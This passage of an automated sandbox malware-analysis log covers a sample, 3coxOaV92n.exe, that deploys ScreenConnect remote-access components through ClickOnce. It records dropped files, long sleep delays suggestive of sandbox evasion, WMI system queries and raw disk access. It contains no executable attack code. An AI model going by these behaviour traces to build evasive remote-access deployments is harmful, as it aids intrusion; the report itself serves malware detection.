                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 2BF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: DD0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 17D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 37D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: A20000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 1A410000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 1240000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 1AD90000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599764Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599655Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599545Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599434Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599289Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598933Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598715Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598010Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597858Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597739Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597624Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597387Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597171Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596843Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596624Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596406Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596296Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596187Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596068Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595945Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595824Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595674Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593905Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593577Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593357Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593249Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593030Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 6631Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 2968Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Users\user\Desktop\3coxOaV92n.exe TID: 5784Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -599874s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -599764s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -599655s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -599545s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -599434s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -599289s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -599047s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -598933s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -598715s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -598312s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -598010s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -597858s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -597739s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -597624s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -597515s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -597387s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -597281s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -597171s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -597062s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -596953s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -596843s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -596734s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -596624s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -596515s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -596406s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -596296s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -596187s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -596068s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -595945s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -595824s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -595674s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -595500s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -595234s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -595109s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -595000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -594890s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -594781s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -594672s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -594562s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -594453s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -594343s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -594234s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -594125s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -594015s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -593905s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -593796s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -593687s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -593577s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -593468s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -593357s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -593249s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -593140s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984Thread sleep time: -593030s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 4796Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe TID: 3572Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 7136Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe TID: 6200Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC4A4B FindFirstFileExA,0_2_00AC4A4B
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599764Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599655Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599545Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599434Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599289Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598933Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598715Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598010Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597858Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597739Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597624Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597387Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597171Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596843Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596624Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596406Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596296Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596187Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596068Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595945Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595824Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595674Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593905Jump to behavior
